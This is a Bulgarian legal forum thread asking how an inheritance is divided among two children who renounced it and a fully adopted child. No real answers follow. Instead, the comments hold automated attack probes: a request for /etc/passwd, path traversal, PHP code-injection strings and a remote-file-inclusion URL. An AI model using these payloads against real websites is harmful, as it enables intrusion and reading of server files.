определяне на наследствен дял

03.06.2010г. 01:40:41
'А 'получава като наследство 10д-ка ниви, жени се за 'Б' през 1940г. и имат 2 деца('В' и' Г') в последствие 'А' осиновява 'Д'(пълно осиновяване) без 'Б' да я осиновява. през 1987г. 'А' почива и 'В' и 'Г' правят отказ от наследство от 'А'. през 1998 'Б' почива. какви са наследствените дялове съответно на 'В','Г' и 'Д'?

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:23
lxbfYeaa
05.10.2023г. 07:23
file:///etc/passwd
lxbfYeaa
05.10.2023г. 07:23
../
lxbfYeaa
05.10.2023г. 07:23
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
lxbfYeaa
05.10.2023г. 07:23
';print(md5(31337));$a='
lxbfYeaa
05.10.2023г. 07:23
";print(md5(31337));$a="
lxbfYeaa
05.10.2023г. 07:23
${@print(md5(31337))}
lxbfYeaa
05.10.2023г. 07:23
${@print(md5(31337))}\
lxbfYeaa
05.10.2023г. 07:23
'.print(md5(31337)).'
lxbfYeaa
05.10.2023г. 07:23
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

Коментар